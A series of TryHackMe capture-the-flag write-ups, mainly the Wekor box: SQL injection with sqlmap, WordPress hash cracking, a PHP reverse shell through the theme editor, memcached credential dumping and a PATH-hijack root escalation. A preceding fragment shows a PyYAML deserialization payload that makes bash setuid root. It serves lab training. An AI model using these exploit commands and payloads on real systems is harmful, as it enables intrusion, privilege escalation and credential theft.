2021/05/12 19:02:01 CMD: UID=0    PID=22832  | /usr/sbin/CRON -f 
2021/05/12 19:02:01 CMD: UID=0    PID=22838  | sudo chown root:root /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22839  | sudo /usr/bin/python /opt/scripts/file.py 
2021/05/12 19:02:05 CMD: UID=0    PID=22840  | ps -e -o pid,ppid,state,command 
2021/05/12 19:03:01 CMD: UID=0    PID=22846  | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22845  | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22844  | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22843  | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22842  | /usr/sbin/CRON -f 
2021/05/12 19:03:01 CMD: UID=0    PID=22841  | /usr/sbin/CRON -f 
2021/05/12 19:03:01 CMD: UID=0    PID=22847  | sudo chown root:root /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22848  | sudo /usr/bin/python /opt/scripts/file.py 
2021/05/12 19:03:07 CMD: UID=0    PID=22849  | ps -e -o pid,ppid,state,command

The script

The cron job runs the following python script with sudo and removes the /tmp/file.yml file.

imsau@enpass:/opt/scripts$ cat file.py 
#!/usr/bin/python
import yaml


class Execute():
  def __init__(self,file_name ="/tmp/file.yml"):
    self.file_name = file_name
    self.read_file = open(file_name ,"r")

  def run(self):
    return self.read_file.read()

data  = yaml.load(Execute().run())

Exploit

We don’t have write access to the script itself, but searching for exploits affecting the yaml library that is imported will lead to this issue.

Let’s exploit it:

$ cp `which bash` /tmp/bash
$ cat > /tmp/file.yml << EOF
!!python/object/new:os.system ["chown root /tmp/bash;chmod u+s /tmp/bash"]
EOF

Root shell

After a minute, we have a root shell:

imsau@enpass:/tmp$ ./bash -p
bash-4.3# cat /root/root.txt
5d45f08ee939521d59247233d3f8faf

Root flag: 5d45f08ee939521d59247233d3f8faf

TryHackMe > Wekor

Wed, 12 May 2021 11:58:00 +0000

CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;)

Hey Everyone! This Box is just a little CTF I’ve prepared recently. I hope you enjoy it as it is my first time ever creating something like this !

This CTF is focused primarily on enumeration, better understanding of services and thinking out of the box for some parts of this machine.

Feel free to ask any questions…It’s okay to be confused in some parts of the box ;)

Just a quick note, Please use the domain wekor.thm as it could be useful later on in the box ;)

User flag

Nmap scan

Let’s add the domain, as instructed:

┌──(kali㉿kali)-[/data/Wekor]
└─$ echo "10.10.207.93 wekor.thm" | sudo tee -a /etc/hosts
[sudo] password for kali: 
10.10.207.93 wekor.thm

Nmap reveals 2 open ports:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 95:c3:ce:af:07:fa:e2:8e:29:04:e4:cd:14:6a:21:b5 (RSA)
|   256 4d:99:b5:68:af:bb:4e:66:ce:72:70:e6:e3:f8:96:a4 (ECDSA)
|_  256 0d:e5:7d:e8:1a:12:c0:dd:b7:66:5e:98:34:55:59:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 9 disallowed entries 
| /workshop/ /root/ /lol/ /agent/ /feed /crawler /boot 
|_/comingreallysoon /interesting
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Robots.txt

Starting with the web port, the robots.txt file reveals several locations:

User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting

Most of the locations lead to 404 errors, but 1:

┌──(kali㉿kali)-[/data/Wekor]
└─$ for i in `curl -s http://wekor.thm/robots.txt | grep Disallow | cut -d " " -f2`;do echo $i;curl -I http://wekor.thm$i;echo "---";done
/workshop/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1

---
/root/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1

---
/lol/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1

---
/agent/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1

---
/feed
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1

---
/crawler
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1

---
/boot
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1

---
/comingreallysoon
HTTP/1.1 301 Moved Permanently
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: http://wekor.thm/comingreallysoon/
Content-Type: text/html; charset=iso-8859-1

---
/interesting
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1

Browsing http://wekor.thm/comingreallysoon/ discloses a new location: /it-next:

┌──(kali㉿kali)-[/data/Wekor]
└─$ curl -s http://wekor.thm/comingreallysoon/
Welcome Dear Client!

We've setup our latest website on /it-next, Please go check it out!

If you have any comments or suggestions, please tweet them to @faketwitteraccount!

Thanks a lot !

SQL Injection

There are many pages in this website. Checking all pages where forms are available led me to a SQL injection vulnerability in the it_cart.php page. Intercept the page with BurpSuite, save the POST request as ìt_cart_coupon.xml and use sqlmap to dump the database:

$ sqlmap -r it_cart_coupon.xml --dump-all --threads=10

SQLmap has dumped 2 interesting databases: coupons and worpress:

┌──(kali㉿kali)-[~/…/sqlmap/output/wekor.thm/dump]
└─$ ll
total 24
drwxr-xr-x 2 kali kali 4096 May 11 19:45 coupons
drwxr-xr-x 2 kali kali 4096 May 11 19:45 information_schema
drwxr-xr-x 2 kali kali 4096 May 11 19:46 mysql
drwxr-xr-x 2 kali kali 4096 May 11 19:47 performance_schema
drwxr-xr-x 2 kali kali 4096 May 11 19:49 sys
drwxr-xr-x 2 kali kali 4096 May 11 19:49 wordpress

List of tables in the wordpress database:

┌──(kali㉿kali)-[~/…/sqlmap/output/wekor.thm/dump]
└─$ tree wordpress 
wordpress
├── option_value-36999631.bin
├── post_content-15186792.bin
├── wp_comments.csv
├── wp_options.csv
├── wp_postmeta.csv
├── wp_posts.csv
├── wp_term_relationships.csv
├── wp_terms.csv
├── wp_term_taxonomy.csv
├── wp_usermeta.csv
└── wp_users.csv

Wordpress Users:

┌──(kali㉿kali)-[~/…/output/wekor.thm/dump/wordpress]
└─$ cat wp_users.csv     
ID,user_url,user_pass,user_email,user_login,user_status,display_name,user_nicename,user_registered,user_activation_key
1,http://site.wekor.thm/wordpress,$P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B.,admin@wekor.thm,admin,0,admin,admin,2021-01-21 20:33:37,
5743,http://jeffrey.com,$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10,jeffrey@wekor.thm,wp_jeffrey,0,wp jeffrey,wp_jeffrey,2021-01-21 20:34:50,1611261290:$P$BufzJsT0fhM94swehg1bpDVTupoxPE0
5773,http://yura.com,$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/,yura@wekor.thm,wp_yura,0,wp yura,wp_yura,2021-01-21 20:35:27,
5873,http://eagle.com,$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/,eagle@wekor.thm,wp_eagle,0,wp eagle,wp_eagle,2021-01-21 20:36:11,

There is an interesting information associated to the admin account: http://site.wekor.thm/wordpress may be the URL to Wordpress.

Wordpress credentials

All user accounts but admin have been cracked:

┌──(kali㉿kali)-[/data/Wekor/files]
└─$ /data/src/john/run/john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt                                1 ⚙
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockyou          (wp_jeffrey)
xxxxxx           (wp_eagle)
soccer13         (wp_yura)
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed

Wordpress

Let’s add the new virtualhost:

$ echo "10.10.207.93 site.wekor.thm" | sudo tee -a /etc/hosts

Now, browsing http://site.wekor.thm/wordpress leads to a Wordpress installation. we immediately jump to http://site.wekor.thm/wordpress/wp-admin/ and try the credentials found previously. Trying the 3 accounts reveals that wp_yura is actually granted administrator privileges

admin: Administrator, but we haven’t been able to crack the password
wp_eagle: Subscriber
wp_jeffrey: Subscriber
wp_yura: Administrator

Reverse Shell

Now that we are logged in with admin privileges, go to “Appearance > Theme Editor”, and edit the 404.php template page to replace its content with a PHP reverse shell. Start a listener (nc -nlvp 4444) and browse http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/404.php. We now have a reverse shell.

Lateral move (www-data -> Orka)

Running linpeas.sh will reveal several services running for localhost only, 1 of which on port 11211.

[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:3010          0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 ::1:631                 :::*                    LISTEN      -

After some reasearch on the Internet, I found this post about memcache. Let’s check if we can dump cached information:

www-data@osboxes:/$ echo "stats items" | nc -vn -w 1 127.0.0.1 11211
echo "stats items" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
STAT items:1:number 5
STAT items:1:age 1361
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 0
STAT items:1:lrutail_reflocked 0
END
www-data@osboxes:/$ echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211
echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
ITEM id [4 b; 1620801753 s]
ITEM email [14 b; 1620801753 s]
ITEM salary [8 b; 1620801753 s]
ITEM password [15 b; 1620801753 s]
ITEM username [4 b; 1620801753 s]
END
www-data@osboxes:/$ echo "get username" | nc -vn -w 1 127.0.0.1 11211
echo "get username" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
VALUE username 0 4
Orka
END
www-data@osboxes:/$ echo "get password" | nc -vn -w 1 127.0.0.1 11211
echo "get password" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
VALUE password 0 15
OrkAiSC00L24/7$
END
www-data@osboxes:/$

We have been able to get Orka’s password: OrkAiSC00L24/7$

User flag

Connect as Orka and get the user flag:

www-data@osboxes:/$ su Orka
su Orka
Password: OrkAiSC00L24/7$

Orka@osboxes:~$ cat /home/Orka/user.txt
1a26a6d51c0172400add0e297608dec6

User flag: 1a26a6d51c0172400add0e297608dec6

Root flag

Orka’s privileges

Orka can run a bitcoin binary as root with sudo.

Orka@osboxes:~/.ssh$ sudo -l
sudo -l
[sudo] password for Orka: OrkAiSC00L24/7$

Matching Defaults entries for Orka on osboxes:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User Orka may run the following commands on osboxes:
    (root) /home/Orka/Desktop/bitcoin

Checking the directory where this binary lands reveals a python script:

Orka@osboxes:~/Desktop$ ll
ll
total 20
drwxrwxr-x  2 root root 4096 Jan 23 17:45 ./
drwxr-xr-- 19 Orka Orka 4096 May 12 03:51 ../
-rwxr-xr-x  1 root root 7696 Jan 23 15:23 bitcoin*
-rwxr--r--  1 root root  588 Jan 23 14:27 transfer.py*

Running strings against the binary will reveal the expected password (password). Let’s run it:

Orka@osboxes:~/Desktop$ ./bitcoin
./bitcoin
Enter the password : password
password
Access Granted...
            User Manual:            
Maximum Amount Of BitCoins Possible To Transfer at a time : 9 
Amounts with more than one number will be stripped off! 
And Lastly, be careful, everything is logged :) 
Amount Of BitCoins : 20
20
Saving 2 BitCoin(s) For Later Use 
Do you want to make a transfer? Y/N : Y
Y
Transfering 2 BitCoin(s) 
Transfer Completed Successfully...

Reverse engineering (bitcoin, transfer.py)

Get a copy of both files and analyze the binary in Hopper to get the following pseudo code. We see that the binary calls a python script (transfer.py) with a relative path:

int main(int arg0) {
    ebp = &stack[-8];
    *(ebp - 0xc) = *0x14;
    printf("Enter the password : ");
    gets(ebp - 0x7f);
    esp = ((((esp & 0xfffffff0) - 0xa0) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10;
    if (strcmp(ebp - 0x7f, "password") != 0x0) {
            puts("Access Denied... ");
    }
    else {
            puts("Access Granted...");
            sleep(0x1);
            puts("\t\t\tUser Manual:\t\t\t");
            puts("Maximum Amount Of BitCoins Possible To Transfer at a time : 9 ");
            puts("Amounts with more than one number will be stripped off! ");
            puts("And Lastly, be careful, everything is logged :) ");
            printf("Amount Of BitCoins : ");
            __isoc99_scanf(0x804893b);
            esp = ((((((((esp - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10 - 0x10) + 0x10;
            eax = __ctype_b_loc();
            eax = *eax;
            edx = *(int8_t *)(ebp - 0x80) & 0xff;
            if ((*(int16_t *)(eax + sign_extend_32(edx) + sign_extend_32(edx)) & 0xffff & 0xffff & 0x800) == 0x0) {
                    puts("\n Sorry, This is not a valid amount! ");
            }
            else {
                    sprintf(ebp - 0x70, "python /home/Orka/Desktop/transfer.py %c", sign_extend_32(*(int8_t *)(ebp - 0x80) & 0xff));
                    system(ebp - 0x70);
            }
    }
    ecx = *(ebp - 0xc);
    ecx = ecx ^ *0x14;
    if (ecx != 0x0) {
            eax = __stack_chk_fail();
    }
    else {
            eax = 0x0;
    }
    return eax;
}

The python script is as follows:

Orka@osboxes:~/Desktop$ cat transfer.py
cat transfer.py
import time
import socket
import sys
import os

result = sys.argv[1]

print "Saving " + result + " BitCoin(s) For Later Use "

test = raw_input("Do you want to make a transfer? Y/N : ")

if test == "Y":
    try:
        print "Transfering " + result + " BitCoin(s) "
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        connect = s.connect(("127.0.0.1",3010))
        s.send("Transfer : " + result + "To https://transfer.bitcoins.com")
        time.sleep(2.5)
        print ("Transfer Completed Successfully...")
        time.sleep(1)
        s.close()
    except:
        print("Error!")
else:
    print("Quitting...")
    time.sleep(1)

Hijack the python binary

As python is called with a relative path, we can hijack the python binary. Checking the PATH environment variable:

Orka@osboxes:/$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games

Write access to /usr/sbin:

Orka@osboxes:/$ ls -la /usr/sbin/ | head
ls -la /usr/sbin/ | head
total 41284
drwxrwxr-x  2 root Orka    12288 Jan 23 16:01 . <----------------- write access
drwxr-xr-x 11 root root     4096 Feb 26  2019 ..
lrwxrwxrwx  1 root root        7 Aug 12  2020 a2disconf -> a2enmod
lrwxrwxrwx  1 root root        7 Aug 12  2020 a2dismod -> a2enmod
lrwxrwxrwx  1 root root        7 Aug 12  2020 a2dissite -> a2enmod
lrwxrwxrwx  1 root root        7 Aug 12  2020 a2enconf -> a2enmod
-rwxr-xr-x  1 root root    15424 Jul 15  2020 a2enmod
lrwxrwxrwx  1 root root        7 Aug 12  2020 a2ensite -> a2enmod
-rwxr-xr-x  1 root root     9870 Aug 12  2020 a2query
ls: write error: Broken pipe

Let’s write a fake python binary in /usr/bin/ that will spawn a root shell:

$ cat > /usr/sbin/python << EOF
#!/bin/bash
/bin/bash
EOF
$ chmod +x /usr/sbin/python

Root access

Now, running the program will spawn a root shell and we can get the root flag:

Orka@osboxes:/$ cat > /usr/sbin/python << EOF
#!/bin/bash
/bin/bash
EOF
cat > /usr/sbin/python << EOF
> #!/bin/bash
> /bin/bash
> EOF
Orka@osboxes:/$ chmod +x /usr/sbin/python
chmod +x /usr/sbin/python
Orka@osboxes:/$ sudo /home/Orka/Desktop/bitcoin
sudo /home/Orka/Desktop/bitcoin
Enter the password : password
password
Access Granted...
            User Manual:            
Maximum Amount Of BitCoins Possible To Transfer at a time : 9 
Amounts with more than one number will be stripped off! 
And Lastly, be careful, everything is logged :) 
Amount Of BitCoins : 20
20
root@osboxes:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@osboxes:/# cat /root/root.txt
cat /root/root.txt
f4e788f87cc3afaecbaf0f0fe9ae6ad7

Root flag: f4e788f87cc3afaecbaf0f0fe9ae6ad7

Aldeid News

Navigating the Dark Web

TryHackMe > Unbaked Pie

User Flag

Services

Django application

Pickle in the search

Exploit

Evade docker

Database

Brute force ramsey’s SSH account

Ramsey’s flag

Root Flag

Lateral move (ramsey -> oliver)

Privilege escalation

TryHackMe > Cooctus Stories

Paradox is nomming cookies

Services

NFS

Web

Reverse Shell

Paradox Flag

Find out what Szymex is working on

The SniffingCat.py script

Reverse engineer the password

Lateral move (paradox -> szymex)

Find out what Tux is working on

First fragment

Second fragment

Third fragment

Crack fragments hash

Tux’s flag

Find out what Varg is working on

Lateral move (tux -> varg)

Get full root privileges

Root flag

TryHackMe > VulnNet Roasted

What is the user flag? (Desktop.txt)

Services

Samba

Find users

Find users without Kerberos pre-authentication

Samba authenticated access (t-skid)

User flag

What is the system flag? (Desktop.txt)

Dump hashes

System flag

TryHackMe > VulnNet Internal

What is the services flag? (services.txt)

Nmap scan

Samba

What is the internal flag? (“internal flag”)

NFS

Redis

What is the user flag? (user.txt)

Redis

rsync

SSH connection / user flag

What is the root flag? (root.txt)

TeamCity

Running commands on TeamCity

TryHackMe > toc2

Find and retrieve the user.txt flag

Services

CMS information

Under Construction!

CMS Made Simple / Reverse Shell

User flag

Escalate your privileges and acquire root.txt

Lateral move (www-data -> frank)

The readcreds binary

Race condition

Root flag

TryHackMe > The Marketplace

What is flag 1?

Services

Web application

Token cookie

XSS vulnerability

Stealing the admin cookie

Samba authenticated access (`t-skid`)